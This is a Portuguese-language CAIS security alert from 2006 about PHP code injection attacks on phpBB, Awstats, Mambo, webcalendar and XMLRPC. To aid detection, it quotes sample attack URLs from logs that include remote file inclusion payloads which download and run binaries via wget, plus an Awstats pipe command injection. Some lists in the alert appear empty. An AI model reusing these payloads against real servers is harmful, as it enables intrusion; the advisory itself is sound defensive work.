| Ataques de injeção de código PHP em aplicações diversasAlerta do CAIS 20060323 [CAIS, 23.03.2006-12:21, revisão 01] O CAIS vem acompanhando um crescente aumento nos ataques a diversos produtos desenvolvidos em PHP. Estes ataques normalmente exploram vulnerabilidades que permitem injeção de código externo nas aplicações PHP. Dentre outros, o CAIS tem observado diversos ataques aos seguintes produtos: Um ataque bem sucedido pode ser usado para diversos propósitos, dentre os quais destacam-se:
O CAIS considera todos estes ataques como altamente críticos, sendo que eles podem ser monitorados e detectados através de assinaturas de snort e analise dos registros de log de servidores WWW. Abaixo alguns exemplos de URL's típicas de ataque encontradas em servidores WWW (os IP's abaixo foram sanitizados para preservar as informações): phpBB: http://example.com/phpBB2/admin/admin_styles.php?phpbb_root_path= http://192.168.2.1/cmd.dat?&cmd=cd%20/tmp;wget%20192.168.1.1/cacti; chmod%20744%20cacti;./cacti;echo%20YYY;echo| Awstats: http://example.com/cgi-bin/awstats/awstats.pl?configdir=| id | Mambo: http://example.com/index2.php?option=com_content&do_pdf=1&id=1index2.php? _REQUEST[option]=com_content&_REQUEST[option]=com_content&_REQUEST[Item id]=1 &GLOBALS=&mosConfig_absolute_path=http://192.168.1.1/heade.gif?&cmd=cd%20 /tmp;wget%20192.168.1.2/chspsp;chmod%200744%20chspsp;./chspsp;echo%20YYY;echo| webcalendar: http://example.com/webcalendar/tools/send_reminders.php?includedir= http://192.168.1.2/cmd.dat?&cmd=cd%20/tmp;wget%20192.168.1.3/haita; chmod%200744%20haita;./haita;echo%20YYY.echo| XMLRPC: POST /xmlrpc.php Na seção de mais informações podem ser encontrados endereços com as assinaturas para o IDS snort capazes de detectar tais ataques. A maioria dos ataques visa a inclusão de arquivos maliciosos nos sistemas atacados, que podem possuir extensões .gif, .dat, .txt, ou mesmo sem extensão. A utilização destas extensões e estes nomes visa camuflar a presença dos mesmos no sistema. A seguir alguns nomes de executáveis encontrados em analises realizadas pelo CAIS:
O CAIS publicou, em 07/11/2005, um alerta referente a vulnerabilidades em diversas aplicações PHP que utilizam XMLRPC. Informações sobre este alerta podem ser obtidas na seção abaixo. Mais informações:
O CAIS recomenda que os administradores mantenham seus sistemas e aplicativos sempre atualizados, de acordo com as últimas versões e correções oferecidas pelos fabricantes. O CAIS Alerta também é oferecido no formato RSS/RDF: | Contato com o Cais: +55 (19) 3787-3300 |